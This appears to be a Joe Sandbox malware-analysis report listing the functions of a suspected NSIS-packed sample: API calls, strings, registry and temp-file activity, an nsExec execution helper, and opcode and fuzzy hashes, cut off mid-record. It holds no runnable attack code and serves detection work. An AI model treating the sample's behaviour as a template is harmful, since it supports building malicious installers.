Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched$ExecToStack$artikulationer\Udsorteringerne
API String ID: 1941528284-1256000645
Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

Function 004052E2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

Completed, xrefs: 00405303, 00405313, 00405319, 0040533C, 00405348

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

Function 004057B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
GetLastError.KERNEL32 ref: 00405808
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
GetLastError.KERNEL32 ref: 00405827

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3449924974-4205471118
Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

artikulationer\Udsorteringerne, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: artikulationer\Udsorteringerne
API String ID: 1356686001-2681483848
Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

Function 00405C3F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405C98
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 00405CA8

Strings

4ou.ou, xrefs: 00405C41
P_B, xrefs: 00405C45

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4ou.ou$P_B
API String ID: 3248276644-2741302951
Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E

Function 00406050 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE

Strings

: Completed, xrefs: 00406053

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

Function 00405D87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DA5
GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405D8C
nsa, xrefs: 00405D94

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2042855515
Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

Function 004064ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
wsprintfW.USER32 ref: 0040653F
LoadLibraryW.KERNELBASE(?), ref: 0040654F

Strings

%s%S.dll, xrefs: 00406539

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

